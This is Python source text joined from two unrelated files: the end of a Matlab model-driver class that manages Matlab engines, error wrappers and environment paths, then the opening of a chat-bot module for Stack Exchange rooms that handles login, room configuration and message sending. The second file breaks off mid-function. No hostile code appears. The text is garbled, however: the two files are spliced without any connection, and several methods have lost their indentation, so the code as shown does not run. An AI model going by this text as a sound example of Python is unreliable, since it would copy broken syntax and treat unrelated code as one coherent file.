            # None until finished, unless kill() forced a code.
            return self._returncode

    def kill(self, *args, **kwargs):
        r"""Cancel the async call."""
        if self.is_alive():
            try:
                out = self.future.cancel()
                self.debug("Result of cancelling Matlab call?: %s", out)
            except matlab.engine.EngineError as e:
                self.debug('Matlab Engine Error: %s' % e)
                self.on_matlab_error()
            except BaseException as e:
                self.debug('Other error on kill: %s' % e)
        self.print_output()
        if self.is_alive():
            # Cancellation failed; tear the engine down as a last resort.
            self.info('Error killing Matlab script.')
            self.matlab_engine.quit()
            self.future = None
            self._returncode = -1
        assert(not self.is_alive())

    def on_matlab_error(self):
        r"""Actions performed on error in Matlab engine."""
        # self.print_output()
        self.debug('')
        if self.matlab_engine is not None:
            # Best-effort dump of the last Matlab exception report.
            try:
                self.matlab_engine.eval('exception = MException.last;', nargout=0)
                self.matlab_engine.eval('getReport(exception)')
            except matlab.engine.EngineError:
                pass
class MatlabModelDriver(InterpretedModelDriver):  # pragma: matlab
    r"""Base class for running Matlab models.

    Args:
        name (str): Driver name.
        args (str or list): Argument(s) for running the model in matlab.
            Generally, this should be the full path to a Matlab script.
        use_symunit (bool, optional): If True, input/output variables with
            units will be represented in Matlab using symunit. Defaults to
            False.
        **kwargs: Additional keyword arguments are passed to parent class's
            __init__ method.

    Attributes:
        started_matlab (bool): True if the driver had to start a new matlab
            engine. False otherwise.
        screen_session (str): Screen session that Matlab was started in.
        mlengine (object): Matlab engine used to run script.
        mlsession (str): Name of the Matlab session that was started.

    Raises:
        RuntimeError: If Matlab is not installed.

    .. note:: Matlab models that call exit will shut down the shared engine.

    """
    _schema_subtype_description = ('Model is written in Matlab.')
    _schema_properties = {
        'use_symunit': {'type': 'boolean', 'default': False}}
    language = 'matlab'
    language_ext = '.m'
    base_languages = ['python']
    # NOTE: '-r' is swapped for '-batch' in __init__ on R2019+ installs.
    default_interpreter_flags = ['-nodisplay', '-nosplash', '-nodesktop',
                                 '-nojvm', '-r']
    version_flags = ["fprintf('R%s', version('-release')); exit();"]
    path_env_variable = 'MATLABPATH'
    # Evaluated at class-creation time from the environment.
    comm_linger = (os.environ.get('YGG_MATLAB_ENGINE', '').lower() == 'true')
    send_converters = {'pandas': serialize.consolidate_array,
                       'table': serialize.consolidate_array}
    recv_converters = {'pandas': 'array'}
    # Mapping from framework type names to the Matlab types representing them.
    type_map = {
        'int': 'intX',
        'float': 'single, double',
        'string': 'char',
        'array': 'cell',
        'object': 'containers.Map',
        'boolean': 'logical',
        'null': 'NaN',
        'uint': 'uintX',
        'complex': 'complex',
        'bytes': 'char (utf-8)',
        'unicode': 'char',
        '1darray': 'mat',
        'ndarray': 'mat',
        'ply': 'containers.Map',
        'obj': 'containers.Map',
        'schema': 'containers.Map'}
    # Code-generation templates/regexes for emitting and parsing Matlab code.
    function_param = {
        'istype': 'isa({variable}, \'{type}\')',
        'len': 'length({variable})',
        'index': '{variable}{{{index}}}',
        'first_index': 1,
        'python_interface': ('{channel} = YggInterface(\'{python_interface}\', '
                             '\'{channel_name}\');'),
        'python_interface_format': ('{channel} = YggInterface('
                                    '\'{python_interface}\', '
                                    '\'{channel_name}\', '
                                    '\'{format_str}\');'),
        'input': '{channel} = YggInterface(\'YggInput\', \'{channel_name}\');',
        'output': '{channel} = YggInterface(\'YggOutput\', \'{channel_name}\');',
        'recv_function': '{channel}.recv',
        'send_function': '{channel}.send',
        'multiple_outputs': '[{outputs}]',
        'eol': ';',
        'comment': '%',
        'true': 'true',
        'false': 'false',
        'not': 'not',
        'and': '&&',
        'indent': 2 * ' ',
        'quote': '\'',
        'print_generic': 'disp({object});',
        'print': 'disp(\'{message}\');',
        'fprintf': 'fprintf(\'{message}\', {variables});',
        'error': 'error(\'{error_msg}\');',
        'block_end': 'end',
        'line_end': ';',
        'if_begin': 'if ({cond})',
        'if_elif': 'elseif ({cond})',
        'if_else': 'else',
        'for_begin': 'for {iter_var} = {iter_begin}:{iter_end}',
        'while_begin': 'while ({cond})',
        'break': 'break;',
        'try_begin': 'try',
        'try_except': 'catch {error_var}',
        'assign': '{name} = {value};',
        'expand_mult': '{name} = {value}{{:}};',
        'functions_defined_last': True,
        'function_def_begin': 'function {output_var} = {function_name}({input_var})',
        'function_def_regex': (
            r'function *(\[ *)?(?P<outputs>.*?)(?(1)\]) *'
            r'= *{function_name} *\((?P<inputs>(?:.|\n)*?)\)\n'
            r'(?:(?P<body>'
            r'(?:\s*if(?:.*?\n?)*?end;?)|'
            r'(?:\s*for(?:.*?\n?)*?end;?)|'
            r'(?:\s*parfor(?:.*?\n?)*?end;?)|'
            r'(?:\s*switch(?:.*?\n?)*?end;?)|'
            r'(?:\s*try(?:.*?\n?)*?end;?)|'
            r'(?:\s*while(?:.*?\n?)*?end;?)|'
            r'(?:\s*arguments(?:.*?\n?)*?end;?)|'
            r'(?:(?:.*?\n?)*?)'
            r')'
            r'(?:\s*end;?))?'),
        'inputs_def_regex': (
            r'\s*(?P<name>.+?)\s*(?:(?:,(?: *... *\n)?)|$)'),
        'outputs_def_regex': (
            r'\s*(?P<name>.+?)\s*(?:,|$)')}
    def __init__(self, name, args, **kwargs):
        r"""Initialize the driver, preferring the shared Matlab engine when
        the matlab.engine package is installed."""
        self.using_matlab_engine = _matlab_engine_installed
        if self.using_matlab_engine:
            # The engine is used directly, so no interpreter subprocess.
            kwargs['skip_interpreter'] = True
        self.model_wrapper = None
        # -batch command line option introduced in 2019
        if (self.is_installed()):
            # NOTE: lexicographic compare of release strings ('r2019a' etc.);
            # valid while releases stay in the rYYYYx format.
            if (((self.language_version().lower() >= 'r2019')
                 and ('-r' in self.default_interpreter_flags))):
                # NOTE(review): this mutates the CLASS-level flags list, so it
                # affects all instances — confirm that is intended.
                self.default_interpreter_flags[
                    self.default_interpreter_flags.index('-r')] = '-batch'
        super(MatlabModelDriver, self).__init__(name, args, **kwargs)
        self.started_matlab = False
        self.screen_session = None
        self.mlengine = None
        self.mlsession = None
        self.mlprocess = None
    @staticmethod
    def after_registration(cls, **kwargs):
        r"""Operations that should be performed to modify class attributes after
        registration. For compiled languages this includes selecting the
        default compiler. The order of precedence is the config file 'compiler'
        option for the language, followed by the environment variable set by
        _compiler_env, followed by the existing class attribute.
        """
        if platform._is_mac:
            # On macOS Matlab lives in per-release app bundles under
            # /Applications and is usually not on PATH.
            cls._executable_search_dirs = [
                os.path.join(x, 'bin') for x in
                glob.glob('/Applications/MATLAB*')]
        InterpretedModelDriver.after_registration(cls, **kwargs)
def parse_arguments(self, args):
r"""Sort model arguments to determine which one is the executable
and which ones are arguments.
Args:
args (list): List of arguments provided.
"""
super(MatlabModelDriver, self).parse_arguments(args)
model_base, model_ext = os.path.splitext(os.path.basename(self.model_file))
wrap_base = 'wrapped_%s_%s' % (model_base, self.uuid.replace('-', '_'))
# Matlab has a variable name limit of 62
wrap_base = wrap_base[:min(len(wrap_base), 60)]
self.model_wrapper = os.path.join(self.model_dir, wrap_base + model_ext)
self.wrapper_products.append(self.model_wrapper)
    @classmethod
    def write_error_wrapper(cls, fname, try_lines, env=None,
                            matlab_engine=None):
        r"""Write a wrapper for the model that encloses it in a try except so
        that the error can be propagated appropriately.

        Args:
            fname (str): File where the wrapper should be written. If None,
                the wrapper lines are returned instead of written to a file.
            try_lines (list): List of lines to go in the try block.
            env (dict, optional): Dictionary of environment variables
                that should be set before calling the model. Defaults
                to None and is ignored.
            matlab_engine (MatlabEngine, optional): Matlab engine that will be
                used to call the wrapper. If not provided, it is assumed the
                error will be called using the Matlab interpreter on the command
                line. Defaults to None.

        Returns:
            list: The wrapper lines if fname is None; otherwise None (the
                lines are written to fname).

        """
        # Add environment variables explicitly
        lines = []
        if env is not None:
            for k, v in env.items():
                lines.append('setenv(\'%s\', \'%s\')' % (
                    k, v.encode("unicode_escape").decode('utf-8')))
        # Create lines based on use of engine or not
        if matlab_engine is not None:
            # The engine surfaces 'error(...)' as a Python-side exception.
            catch_block = ["error(e.message);"]
        else:
            catch_block = ["rethrow(e);"]
            # catch_block = ["fprintf('MATLAB ERROR:\\n%s\\n', e.message);",
            #                "disp(e.identifier);",
            #                "disp(e.stack);",
            #                "exit(0);"]
        lines += cls.write_try_except(try_lines, catch_block)
        if matlab_engine is None:
            # Without the engine, the interpreter must exit explicitly.
            lines.append("exit(0);")
        # Write lines
        logger.debug('Wrapper:\n\t%s', '\n\t'.join(lines))
        if fname is None:
            return lines
        else:
            if os.path.isfile(fname):  # pragma: debug
                os.remove(fname)
            with open(fname, 'w') as fd:
                fd.write('\n'.join(lines))
            logger.debug("Wrote wrapper to: %s" % fname)
    @classmethod
    def run_code(cls, lines, **kwargs):
        r"""Run code by first writing it as an executable and then calling
        the driver.

        Args:
            lines (list): Lines of code to be wrapped as an executable.
            **kwargs: Additional keyword arguments are passed to the
                write_executable method.

        """
        kwargs.setdefault('process_kwargs', {})
        if not kwargs['process_kwargs'].get('dont_wrap_error', False):
            # Wrap in a try/catch here and flag it so run_executable does
            # not wrap a second time.
            lines = cls.write_error_wrapper(
                None, lines, env=kwargs.get('env', None),
                matlab_engine=kwargs.get('matlab_engine', None))
            kwargs['process_kwargs']['dont_wrap_error'] = True
        return super(MatlabModelDriver, cls).run_code(lines, **kwargs)
    @classmethod
    def run_executable(cls, args, dont_wrap_error=False, fname_wrapper=None,
                       matlab_engine=None, **kwargs):
        r"""Run a program using the executable for this language and the
        provided arguments.

        Args:
            args (list): The program that should be run and any arguments
                that should be provided to it.
            dont_wrap_error (bool, optional): If False, the executable will be
                wrapped in a try/catch block to prevent errors from stopping
                Matlab shutdown. If True, the command will be executed as is
                with the Matlab interpreter. Defaults to False.
            fname_wrapper (str, optional): File where wrapper should be saved.
                If not provided, one is created. Defaults to None.
            matlab_engine (MatlabEngine, optional): Matlab engine that should be
                used to run the command. If not provided, the Matlab interpreter
                is used instead. Defaults to None.
            **kwargs: Additional keyword arguments are passed to
                cls.executable_command and tools.popen_nobuffer.

        Returns:
            str: Output to stdout from the run command.

        Raises:
            RuntimeError: If the language is not installed.
            RuntimeError: If there is an error when running the command.

        """
        # Strip file if first argument is a file
        if os.path.isfile(args[0]):
            # Matlab runs scripts by bare name from the working directory.
            kwargs.setdefault('working_dir', os.path.dirname(args[0]))
            args = [os.path.splitext(os.path.basename(args[0]))[0]] + args[1:]
        # Write wrapper
        if (not dont_wrap_error) and (len(args) > 0):
            if len(args) == 1:
                # TODO: Will this work if there is a function defined in the
                # script?
                try_block = [args[0]]
                if not try_block[0].endswith(';'):
                    try_block[0] += ';'
            else:
                # Put quotes around arguments since they would be strings when
                # passed from the command line
                func_call = "%s('%s'" % (args[0], args[1])
                for a in args[2:]:
                    func_call += (", '%s'" % a)
                func_call += ');'
                try_block = [func_call]
            if fname_wrapper is None:
                fname_wrapper = 'wrapper_%s%s' % (str(uuid_gen.uuid4()),
                                                  cls.language_ext[0])
                # '-' is not valid in a Matlab function name.
                fname_wrapper = fname_wrapper.replace('-', '_')
                working_dir = kwargs.get('working_dir', kwargs.get('cwd', None))
                if working_dir is not None:
                    fname_wrapper = os.path.join(working_dir, fname_wrapper)
            cls.write_error_wrapper(fname_wrapper, try_block,
                                    env=kwargs.get('env', None),
                                    matlab_engine=matlab_engine)
            assert(os.path.isfile(fname_wrapper))
            args = [os.path.splitext(os.path.basename(fname_wrapper))[0]]
        # Call base, catching error to remove temp wrapper
        try:
            if matlab_engine is None:
                kwargs['for_matlab'] = True
                out = InterpretedModelDriver.run_executable.__func__(
                    cls, args, **kwargs)
            else:
                if kwargs.get('debug_flags', None):  # pragma: debug
                    logger.warn("Debugging via valgrind, strace, etc. disabled "
                                "for Matlab when using a Matlab shared engine.")
                # Engine-backed runs must be asynchronous.
                assert(kwargs.get('return_process', False))
                # Add environment variables
                env = kwargs.get('env', {})
                old_env = {}
                new_env_str = ''
                for k, v in env.items():
                    old_env[k] = matlab_engine.getenv(k)
                    matlab_engine.setenv(k, v, nargout=0)
                    new_env_str += "'%s', %s, " % (k, repr(v))
                # Mirror the variables into the engine's embedded Python too.
                matlab_engine.eval('new_env = py.dict(pyargs(%s));'
                                   % new_env_str[:-2], nargout=0)
                matlab_engine.eval('os.environ.update(new_env);', nargout=0)
                # Create matlab process using Matlab engine
                out = MatlabProcess(name=args[0] + '.MatlabProcess',
                                    target=getattr(matlab_engine, args[0]),
                                    args=args[1:], matlab_engine=matlab_engine)
                out.start()
        finally:
            # Wrapper is only kept for async runs that may still need it.
            if (((not kwargs.get('return_process', False))
                 and (fname_wrapper is not None))):
                os.remove(fname_wrapper)
        return out
@classmethod
def language_version(cls, skip_config=False):
r"""Determine the version of this language.
Args:
skip_config (bool, optional): If True, the config option
for the version (if it exists) will be ignored and
the version will be determined fresh.
Returns:
str: Version of compiler/interpreter for this language.
"""
if cls.cfg.has_option(cls.language, 'version') and (not skip_config):
return cls.cfg.get(cls.language, 'version')
return cls.get_matlab_info()[1]
    @classmethod
    def executable_command(cls, args, **kwargs):
        r"""Compose a command for running a program in this language with the
        provided arguments. If not already present, the interpreter command and
        interpreter flags are prepended to the provided arguments.

        Args:
            args (list): The program that returned command should run and any
                arguments that should be provided to it.
            **kwargs: Additional keyword arguments are ignored.

        Returns:
            list: Arguments composing the command required to run the program
                from the command line using the interpreter for this language.

        """
        # if kwargs.get('exec_type', 'interpreter') == 'interpreter':
        #     args = ["\"%s\"" % (' '.join(args))]
        return super(MatlabModelDriver, cls).executable_command(args, **kwargs)
@classmethod
def configure(cls, cfg):
r"""Add configuration options for this language. This includes locating
any required external libraries and setting option defaults.
Args:
cfg (YggConfigParser): Config class that options should be set for.
Returns:
list: Section, option, description tuples for options that could not
be set.
"""
out = InterpretedModelDriver.configure.__func__(cls, cfg)
opts = {
'startup_waittime_s': [('The time allowed for a Matlab engine to start'
'before timing out and reporting an error.'),
'10'],
'version': ['The version (release number) of installed Matlab.', ''],
'matlabroot': ['The path to the default installation of matlab.', '']}
if ((cfg.get(cls.language, 'disable', 'False').lower() != 'true'
and (not (cfg.has_option(cls.language, 'matlabroot')
and cfg.has_option(cls.language, 'version'))))):
try:
opts['matlabroot'][1], opts['version'][1] = cls.get_matlab_info()
except RuntimeError: # pragma: no matlab
pass
for k in opts.keys():
if not cfg.has_option(cls.language, k):
if opts[k][1]: # pragma: matlab
cfg.set(cls.language, k, opts[k][1])
else:
out.append((cls.language, k, opts[k][0]))
return out
    @classmethod
    def get_matlab_info(cls):  # pragma: matlab
        r"""Determine the root directory where Matlab is installed and the version
        that is installed (if Matlab is installed at all). This will fail if Matlab
        is not installed, cannot be started, or does not operate as expected.

        Returns:
            tuple: Matlab root directory and Matlab version string.

        Raises:
            RuntimeError: If Matlab cannot be started or the root directory or
                release cannot be determined.

        """
        # Sentinel delimiting matlabroot/release inside Matlab's output so
        # they can be recovered from arbitrary surrounding text.
        mtl_id = '=MATLABROOT='
        cmd = ("fprintf('" + mtl_id + "%s" + mtl_id + "R%s" + mtl_id + "'"
               + ",matlabroot,version('-release'));")
        mtl_proc = cls.run_executable([cmd])
        if mtl_id not in mtl_proc:  # pragma: debug
            raise RuntimeError(("Could not locate ID string (%s) in "
                                "output (%s).") % (mtl_id, mtl_proc))
        parts = mtl_proc.split(mtl_id)
        if len(parts) < 3:  # pragma: debug
            raise RuntimeError(("Could not get matlabroot/version from "
                                "output (%s).") % (mtl_proc))
        # Index from the end: trailing startup noise may precede the sentinel.
        matlabroot = parts[-3]
        release = parts[-2]
        return matlabroot, release
    def start_matlab_engine(self):
        r"""Start matlab session and connect to it.

        Tries to attach to an existing shared Matlab session first; starts a
        new one (via the module-level start_matlab_engine helper) otherwise.
        """
        ml_attr = ['screen_session', 'mlengine', 'mlsession', 'mlprocess']
        attempt_connect = (len(matlab.engine.find_matlab()) != 0)
        # Connect to matlab if a session exists
        if attempt_connect:
            for mlsession in matlab.engine.find_matlab():
                try:
                    self.debug("Trying to connect to session %s", mlsession)
                    self.mlengine = connect_matlab_engine(mlsession)
                    self.mlsession = mlsession
                    self.debug("Connected to existing shared engine: %s",
                               self.mlsession)
                    break
                except matlab.engine.EngineError:
                    # Session may be dead or claimed; try the next one.
                    pass
        # Start if not running or connect failed
        if self.mlengine is None:
            if attempt_connect:
                self.debug("Starting a matlab shared engine (connect failed)")
            else:
                self.debug("Starting a matlab shared engine (none existing)")
            # NOTE: this resolves to the MODULE-level start_matlab_engine()
            # helper, not this method (globals win inside the function body).
            out = start_matlab_engine()
            for i, attr in enumerate(ml_attr):
                setattr(self, attr, out[i])
            self.started_matlab = True
        # Add things to Matlab environment
        self.mlengine.addpath(self.model_dir, nargout=0)
        self.debug("Connected to matlab session '%s'" % self.mlsession)
    def before_start(self):
        r"""Actions to perform before the run loop."""
        kwargs = dict(fname_wrapper=self.model_wrapper)
        if self.using_matlab_engine:
            self.start_matlab_engine()
            # Engine-backed runs poll output themselves (see run_loop).
            kwargs.update(matlab_engine=self.mlengine,
                          no_queue_thread=True)
        else:
            kwargs.update(working_dir=self.model_dir)
        with self.lock:
            if self.using_matlab_engine and (self.mlengine is None):  # pragma: debug
                self.debug('Matlab engine not set. Stopping')
                return
            super(MatlabModelDriver, self).before_start(**kwargs)
    def run_loop(self):
        r"""Loop to check if model is still running and forward output."""
        if self.using_matlab_engine:
            self.model_process.print_output()
            self.periodic_debug('matlab loop', period=100)('Looping')
            if self.model_process.is_done():
                self.model_process.print_output()
                self.set_break_flag()
                try:
                    # result() re-raises any error from the Matlab call.
                    self.model_process.future.result()
                    self.model_process.print_output()
                except matlab.engine.EngineError:
                    # Engine-side failure; output already carries the details.
                    self.model_process.print_output()
                except BaseException:
                    self.model_process.print_output()
                    self.exception("Error running model.")
            else:
                self.sleep()
        else:
            super(MatlabModelDriver, self).run_loop()
    def after_loop(self):
        r"""Actions to perform after run_loop has finished. Mainly checking
        if there was an error and then handling it."""
        if self.using_matlab_engine:
            if (self.model_process is not None) and self.model_process.is_alive():
                # Still running: kill it and skip normal teardown.
                self.info("Model process thread still alive")
                self.kill_process()
                return
        super(MatlabModelDriver, self).after_loop()
        if self.using_matlab_engine:
            with self.lock:
                self.cleanup()
def cleanup(self):
r"""Close the Matlab session and engine."""
if self.using_matlab_engine:
try:
stop_matlab_engine(self.screen_session, self.mlengine,
self.mlsession, self.mlprocess,
keep_engine=(not self.started_matlab))
except (SystemError, Exception) as e: # pragma: debug
self.error('Failed to exit matlab engine')
self.raise_error(e)
self.debug('Stopped Matlab')
self.screen_session = None
self.mlsession = None
self.started_matlab = False
self.mlengine = None
self.mlprocess = None
super(MatlabModelDriver, self).cleanup()
def check_exits(self):
r"""Check to make sure the program dosn't contain any exits as exits
will shut down the Matlab engine as well as the program.
Raises:
RuntimeError: If there are any exit calls in the file.
"""
has_exit = False
with open(self.raw_model_file, 'r') as fd:
for i, line in enumerate(fd):
if line.strip().startswith('exit'):
has_exit = True
break
if self.using_matlab_engine and has_exit:
warnings.warn(
"Line %d in '%s' contains an " % (
i, self.raw_model_file)
+ "'exit' call which will exit the MATLAB engine "
+ "such that it cannot be reused. Please replace 'exit' "
+ "with a return or error.")
    def set_env(self):
        r"""Get environment variables that should be set for the model process.

        Returns:
            dict: Environment variables for the model process.

        """
        out = super(MatlabModelDriver, self).set_env()
        if self.use_symunit:
            out['YGG_MATLAB_SYMUNIT'] = 'True'
        if self.using_matlab_engine:
            out['YGG_MATLAB_ENGINE'] = 'True'
        # TODO: Move the following to InterpretedModelDriver once another
        # language sets path_env_variable
        # Rebuild MATLABPATH: previous value first, then extra paths not
        # already present, then the model directory.
        path_list = []
        prev_path = out.pop(self.path_env_variable, '')
        if prev_path:
            path_list.append(prev_path)
        if isinstance(self.paths_to_add, list):
            for x in self.paths_to_add:
                # Substring check against the joined previous path.
                if x not in prev_path:
                    path_list.append(x)
        path_list.append(self.model_dir)
        if path_list:
            out[self.path_env_variable] = os.pathsep.join(path_list)
        return out
    @classmethod
    def comm_atexit(cls, comm):
        r"""Operations performed on comm at exit including draining receive.

        Args:
            comm (CommBase): Communication object.

        """
        if comm.direction == 'recv':
            # Drain any pending messages without blocking.
            while comm.recv(timeout=0)[0]:
                comm.sleep()
        else:
            comm.send_eof()
        comm.linger_close()
@classmethod
def decode_format(cls, format_str):
r"""Method for decoding format strings created in this language.
Args:
format_str (str): Encoded format string.
Returns:
str: Decoded format string.
"""
as_str = False
format_str_bytes = format_str
if isinstance(format_str, str):
as_str = True
format_str_bytes = format_str.encode("utf-8")
out = format_str_bytes.decode('unicode-escape')
if not as_str:
out = out.encode("utf-8")
return out
|
chatcommunicate.py | # coding=utf-8
from chatexchange import events
from chatexchange.browser import LoginError
from chatexchange.messages import Message
from chatexchange_extension import Client
import collections
import itertools
import os
import os.path
import queue
import regex
import requests
import sys
import threading
import time
import yaml
import shlex
import datahandling
import metasmoke
import classes.feedback
from helpers import log
from excepthook import log_exception
from globalvars import GlobalVars
from parsing import fetch_post_id_and_site_from_url, fetch_post_url_from_msg_content, fetch_owner_url_from_msg_content
from tasks import Tasks
from socketscience import SocketScience
# messages: {(host, room_id): deque of recently sent message ids}
# reports: OrderedDict of (host, message_id) -> report data (see send_messages)
LastMessages = collections.namedtuple("LastMessages", ["messages", "reports"])
class RoomData:
    """Per-room state: the chat Room object, the time until which the room is
    blocked from receiving messages (-1 = not blocked), and whether the
    deletion watcher is enabled for the room."""
    def __init__(self, room, block_time, deletion_watcher):
        self.room = room
        self.block_time = block_time
        self.deletion_watcher = deletion_watcher
class CmdException(Exception):
    """Chat-command error type. (Presumably raised by command handlers and
    reported back to the user — usage is not visible in this chunk.)"""
    pass
# Command registries (presumably populated by decorators elsewhere in this
# module — not visible in this chunk).
_prefix_commands = {}
_reply_commands = {}

# One chat client per host; filled in by init().
_clients = {
    "stackexchange.com": None,
    "stackoverflow.com": None,
    "meta.stackexchange.com": None
}

# Populated from the YAML room config by parse_room_config().
_command_rooms = set()
_watcher_rooms = set()
_room_roles = {}
_privileges = {}

# Epoch time until which ALL rooms are blocked; -1 means not blocked.
_global_block = -1
# (host, room_id) -> RoomData for every joined room.
_rooms = {}
_last_messages = LastMessages({}, collections.OrderedDict())
# Outgoing messages consumed by the send_messages worker thread.
_msg_queue = queue.Queue()
# Signals the pickle_last_messages thread that _last_messages changed.
_pickle_run = threading.Event()
def init(username, password, try_cookies=True):
    """Log into every chat host, join configured rooms and start the
    background pickling/sending threads.

    Args:
        username (str): Chat account email/username.
        password (str): Chat account password.
        try_cookies (bool, optional): If True, attempt cookie-based login
            first and persist cookies afterwards. Defaults to True.

    Raises:
        Exception: If credential login fails three times for a host.
    """
    global _clients
    global _rooms
    global _room_data
    global _last_messages

    for site in _clients.keys():
        client = Client(site)
        logged_in = False

        if try_cookies:
            if GlobalVars.cookies is None:
                # No cookie store at all; discard any stale pickle.
                datahandling.remove_pickle("cookies.p")
                GlobalVars.cookies = {}
            else:
                cookies = GlobalVars.cookies
                try:
                    if site in cookies and cookies[site] is not None:
                        client.login_with_cookie(cookies[site])
                        logged_in = True
                        log('debug', 'chat.{}: Logged in using cached cookies'.format(site))
                except LoginError as e:
                    exc_type, exc_obj, exc_tb = sys.exc_info()
                    log('debug', 'chat.{}: Login error {}: {}'.format(site, exc_type.__name__, exc_obj))
                    log('debug', 'chat.{}: Falling back to credential-based login'.format(site))
                    # Cached cookie is bad; drop it and re-persist the store.
                    del cookies[site]
                    datahandling.dump_cookies()

        if not logged_in:
            # Up to three credential-login attempts; for/else raises when
            # none of them break out.
            for retry in range(3):
                try:
                    GlobalVars.cookies[site] = client.login(username, password)
                    break
                except Exception as e:
                    exc_type, exc_obj, exc_tb = sys.exc_info()
                    log('debug', 'chat.{}: Login error {}: {}'.format(site, exc_type.__name__, exc_obj))
            else:
                raise Exception("Failed to log into " + site + ", max retries exceeded")

        _clients[site] = client

    # Local override takes precedence over the stock room config.
    if os.path.exists("rooms_custom.yml"):
        parse_room_config("rooms_custom.yml")
    else:
        parse_room_config("rooms.yml")

    if not GlobalVars.standby_mode:
        join_command_rooms()

    if datahandling.has_pickle("messageData.p"):
        try:
            _last_messages = datahandling.load_pickle("messageData.p")
        except EOFError:
            # Truncated/empty pickle; start with the fresh default.
            pass

    threading.Thread(name="pickle ---rick--- runner", target=pickle_last_messages, daemon=True).start()
    threading.Thread(name="message sender", target=send_messages, daemon=True).start()

    if try_cookies:
        datahandling.dump_cookies()
def join_command_rooms():
    """Join every configured command room, start watching its socket for
    incoming messages and register it in _rooms (block_time -1 = unblocked)."""
    for site, roomid in _command_rooms:
        room = _clients[site].get_room(roomid)
        deletion_watcher = (site, roomid) in _watcher_rooms
        room.join()
        room.watch_socket(on_msg)
        _rooms[(site, roomid)] = RoomData(room, -1, deletion_watcher)
def parse_room_config(path):
    """Load room configuration from *path* and user data from users.yml,
    populating _privileges, _command_rooms, _watcher_rooms and _room_roles.

    Args:
        path (str): Path to the YAML room configuration file.
    """
    with open(path, "r", encoding="utf-8") as room_config:
        room_dict = yaml.safe_load(room_config.read())

    with open("users.yml", "r", encoding="utf-8") as user_config:
        user_data = yaml.safe_load(user_config.read())

    inherits = []
    rooms = {}
    # Column index of each chat host's user ID within a users.yml row.
    host_fields = {'stackexchange.com': 1, 'meta.stackexchange.com': 2, 'stackoverflow.com': 3}

    for site, site_rooms in room_dict.items():
        for roomid, room in site_rooms.items():
            room_identifier = (site, roomid)
            rooms[room_identifier] = room

            if "privileges" in room and "inherit" in room["privileges"]:
                # Defer inheritance resolution until all rooms are known.
                inherits.append({'from': (room["privileges"]["inherit"]["site"],
                                          room["privileges"]["inherit"]["room"]), 'to': room_identifier})

                if "additional" in room["privileges"]:
                    _privileges[room_identifier] = \
                        set([user_data[x][host_fields[site]] for x in room["privileges"]["additional"]])
            elif "privileges" in room:
                _privileges[room_identifier] = set([user_data[x][host_fields[site]] for x in room["privileges"]])
            else:
                _privileges[room_identifier] = set()

            if "commands" in room and room["commands"]:
                _command_rooms.add(room_identifier)

            if "watcher" in room and room["watcher"]:
                _watcher_rooms.add(room_identifier)

            if "msg_types" in room:
                add_room(room_identifier, room["msg_types"])

    for inherit in inherits:
        if inherit["from"] in rooms:
            # Map the source room's privileged user IDs back to account names,
            # then forward to the target room's host-specific IDs.
            from_privs = _privileges[inherit["from"]]
            from_accounts = [k for k, v in user_data.items() if v[host_fields[inherit["from"][0]]] in from_privs]
            inherit_from = set([user_data[x][host_fields[inherit["to"][0]]] for x in from_accounts])
            if inherit["to"] in _privileges:
                before = _privileges[inherit["to"]]
                _privileges[inherit["to"]] = _privileges[inherit["to"]] | inherit_from
                # log('debug', '{} inheriting privs from {} with additional: before {}, after {}'.format(
                #     inherit["to"], inherit["from"], before, _privileges[inherit["to"]]))
            else:
                _privileges[inherit["to"]] = inherit_from
        else:
            # BUG FIX: the site slot previously received inherit["to"][1]
            # (the room id) instead of inherit["to"][0] (the host).
            log('warn', 'Room {} on {} specified privilege inheritance from {}, but no such room exists'.format(
                inherit["to"][1], inherit["to"][0], inherit["from"][1]))
def add_room(room, roles):
    """Register *room* under each role in *roles* within the module-level
    _room_roles mapping (role -> set of room identifiers)."""
    for role in roles:
        # setdefault creates the role's set on first use.
        _room_roles.setdefault(role, set()).add(room)
def pickle_last_messages():
    """Daemon-thread body: persist _last_messages to messageData.p each time
    the _pickle_run event is set (set by send_messages after a send)."""
    while True:
        _pickle_run.wait()
        _pickle_run.clear()

        datahandling.dump_pickle("messageData.p", _last_messages)
def send_messages():
    """Daemon-thread body: drain _msg_queue, posting each message to its room
    with up to three retries on HTTP errors; track sent message ids in
    _last_messages and register deletion-watcher callbacks."""
    while True:
        room, msg, report_data = _msg_queue.get()
        if len(msg) > 500 and "\n" not in msg:
            # Single-line messages over 500 chars are rejected by chat.
            log('warn', 'Discarded the following message because it was over 500 characters')
            log('warn', msg)
            _msg_queue.task_done()
            continue

        full_retries = 0

        while full_retries < 3:
            try:
                response = room.room._client._do_action_despite_throttling(("send", room.room.id, msg)).json()

                if "id" in response:
                    identifier = (room.room._client.host, room.room.id)
                    message_id = response["id"]

                    if identifier not in _last_messages.messages:
                        _last_messages.messages[identifier] = collections.deque((message_id,))
                    else:
                        last = _last_messages.messages[identifier]

                        # Keep roughly the last 100 message ids per room.
                        if len(last) > 100:
                            last.popleft()

                        last.append(message_id)

                    if report_data:
                        _last_messages.reports[(room.room._client.host, message_id)] = report_data

                        # Bound the report map to ~50 entries (oldest first).
                        if len(_last_messages.reports) > 50:
                            _last_messages.reports.popitem(last=False)

                        if room.deletion_watcher:
                            # Delete our chat message if the reported post
                            # gets deleted within the timeout.
                            callback = room.room._client.get_message(message_id).delete
                            GlobalVars.deletion_watcher.subscribe(report_data[0], callback=callback, timeout=120)

                    # Wake the pickling thread to persist the new state.
                    _pickle_run.set()

                break
            except requests.exceptions.HTTPError:
                full_retries += 1

        _msg_queue.task_done()
def on_msg(msg, client):
    """Socket callback for room events: dispatch chat commands (reply,
    'sd' shorthand, '!!/' / 'sdc' prefix), feedback comments and
    SocketScience payloads.

    Args:
        msg: chatexchange event (only MessagePosted/MessageEdited handled).
        client: chatexchange client the event arrived on.
    """
    global _room_roles

    if not isinstance(msg, events.MessagePosted) and not isinstance(msg, events.MessageEdited):
        return

    message = msg.message
    room_ident = (client.host, message.room.id)
    room_data = _rooms[room_ident]

    if message.owner.id == client._br.user_id:
        # Our own message: only forward to SocketScience in 'direct' rooms
        # (zero-width characters are transport markers and are stripped).
        if 'direct' in _room_roles and room_ident in _room_roles['direct']:
            SocketScience.receive(message.content_source.replace("\u200B", "").replace("\u200C", ""))

        return

    if message.content.startswith("<div class='partial'>"):
        # Unwrap the 'partial' div chat uses for long messages.
        message.content = message.content[21:]

        if message.content.endswith("</div>"):
            message.content = message.content[:-6]

    if message.parent:
        try:
            if message.parent.owner.id == client._br.user_id:
